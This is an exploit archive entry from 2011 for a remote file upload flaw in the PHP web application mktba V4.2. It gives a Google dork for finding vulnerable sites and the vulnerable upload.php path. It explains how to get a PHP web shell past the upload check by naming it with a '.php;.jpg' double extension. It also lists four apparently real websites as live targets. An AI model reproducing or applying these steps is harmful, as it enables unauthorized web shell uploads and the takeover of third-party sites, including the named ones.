mktba V4.2 Remote File Upload Vulnerability

2011-08-09T00:00:00
ID 1337DAY-ID-16648
Type zdt
Reporter Dr-AnGeL
Modified 2011-08-09T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: mktba V4.2 Remote File Upload Vulnerability
# Date: 09/08/2011
# Author: Dr-AnGeL
# home Page: Sec-1337.com So0N | Sec4ever.com | V4-Team.com | Tryag.CC | 
# Email: [email protected] | [email protected] 
# Category:: webapps
# Google dork: inurl:"powered by mktba v4.2" 
# Tested on: Linux , Win 7 , win Xp
# Greet'z 2 Tw1st3r | I-Hmx | Sec4Ever | JEen-7afrawy| The Injector | Mr. Safa7 | Mr.Dangers |FoX HacKeR | Jago-Dz | S4S | Mr.L4iVe | Kasper-Boy | r1z | JxH | BackTrack | Eng.Silent.Night | ProFeSSoR | 1337Day
# Special Greet'z 2 FreeMAN | EvIL SheLL [R.I.P] | Mr.H4rD3n | Ghamzeh-HacKeR | T0r0b0xHACKER | X-Shadow | TheMMA | TurkisH-RuleZ | Dr.Kro0oz | Dr.5rab | Hmei7 | Web-Sniper | The Rock

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Exploit
http://www.site.com/mktba/upload.php

Now Rename Your Shell 0x0.php;.jpg And up It :)

Live DEmo :
http://www.mltzm.com/elmkeledy/mktba/upload.php
http://www.kuw88.com/mktba/upload.php
http://www.nos7.com/3almal6fal/upload.php
http://www.newzafah.com/mktba/upload.php

The End



#  0day.today [2018-02-17]  #